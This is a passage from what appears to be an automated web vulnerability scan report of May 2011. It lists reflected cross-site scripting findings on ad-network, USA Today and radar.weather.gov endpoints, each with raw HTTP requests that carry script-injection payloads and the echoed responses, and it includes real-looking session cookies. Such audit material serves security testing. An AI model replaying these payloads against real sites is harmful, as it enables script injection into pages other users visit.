GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-45954758_1304955419,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-45954758_1304955419%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D310802%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3Ff9c43'%3balert(1)//bb09889184a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwzJSg7gQQzJSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb681375=5_[r^kI/7Zw[-!!0nf8MPcQ6y?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP7g4Zc5yxUl_SsYda6b2ziVMCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAlg8BAgUCAAUAAAAAxiWa4gAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955460%29%3Buf%28%27c%27%2C+61473%2C+1304955460%29%3Buf%28%27r%27%2C+272040%2C+1304955460%29%3Bppv%287166%2C+%279172079212996409528%27%2C+1304955460%2C+1336491460%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:48 GMT
Content-Length: 729

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...
310802;contx=weath;an=40;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=[timestamp]?f9c43';alert(1)//bb09889184a">
...[SNIP]...

2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61f30'-alert(1)-'6f7e06a5860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rub_usatoday61f30'-alert(1)-'6f7e06a5860/;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=310802;cmpgurl=http%253A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:07 GMT
Connection: close
Set-Cookie: mmpg=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:37:07 GMT
Content-Length: 8102

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-87265582_1304955427","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rub_usatoday61f30'-alert(1)-'6f7e06a5860&size=728x90&imp_id=cm-87265582_1304955427,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.n
...[SNIP]...

2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad9d8"><script>alert(1)</script>e5caccb3aa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14139
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0">
...[SNIP]...

2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8d560<script>alert(1)</script>b7ea99d8653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/images/8d560<script>alert(1)</script>b7ea99d8653 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14127
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/Conus/images/8d560<script>alert(1)</script>b7ea99d8653</b>
...[SNIP]...

2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a3aa<script>alert(1)</script>141b81665a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus7a3aa<script>alert(1)</script>141b81665a4/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14149
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/Conus7a3aa<script>alert(1)</script>141b81665a4/index.php</b>
...[SNIP]...

2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30135'><a>4523c2d38fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Conus30135'><a>4523c2d38fe/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 13944
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<a href='http://radar.weather.gov/Conus30135'><a>4523c2d38fe'>
...[SNIP]...

2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9caa"><script>alert(1)</script>21f22c9fe5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conuse9caa"><script>alert(1)</script>21f22c9fe5f/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14163
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conuse9caa"><script>alert(1)</script>21f22c9fe5f/index.php">
...[SNIP]...

2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998aa"><script>alert(1)</script>932b00c7820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/998aa"><script>alert(1)</script>932b00c7820 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14067
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conus/998aa"><script>alert(1)</script>932b00c7820">
...[SNIP]...

2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9220f"><script>alert(1)</script>9368837639a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/9220f"><script>alert(1)</script>9368837639a HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 15248
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/images/9220f"><script>alert(1)</script>9368837639a">
...[SNIP]...

2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d22b5<script>alert(1)</script>e731b910b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/d22b5<script>alert(1)</script>e731b910b3 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 15232
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/images/d22b5<script>alert(1)</script>e731b910b3</b>
...[SNIP]...

2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d24f"><script>alert(1)</script>beb2182b5f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6d24f"><script>alert(1)</script>beb2182b5f0?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14136
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/6d24f"><script>alert(1)</script>beb2182b5f0?rid=hdx&product=N0R&overlay=11101111&loop=no">
...[SNIP]...

2.104. http://radar.weather.gov/radar.php [product parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The value of the product request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e333"%3balert(1)//b50d5d274da was submitted in the product parameter. This input was echoed as 7e333";alert(1)//b50d5d274da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /radar.php?rid=hdx&product=N0R7e333"%3balert(1)//b50d5d274da&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 09 May 2011 15:43:02 GMT
Date: Mon, 09 May 2011 15:38:02 GMT
Connection: close
Content-Length: 25375

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
t.checkform1." + objs[i]);
theObj.checked = true;
} else {
    theObj = eval("document.checkform1." + objs[i]);
    theObj.checked = false;
   }
   changeVisibility(theObj,i);
}
theProduct = "N0R7E333";ALERT(1)//B50D5D274DA";
var dt = "datetime";
getnewimg(theProduct,'HDX',0,dt);
}
function go(loop) { window.location.href = loop; }
function newpage(radarid,product,loop) {
   var cbox;
   var isloop = (loop==1
...[SNIP]...

2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 110ce<script>alert(1)</script>11b5095b103 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0110ce<script>alert(1)</script>11b5095b103 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:39:12 GMT
Connection: close
Content-Length: 94408

plcb0110ce<script>alert(1)</script>11b5095b103('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
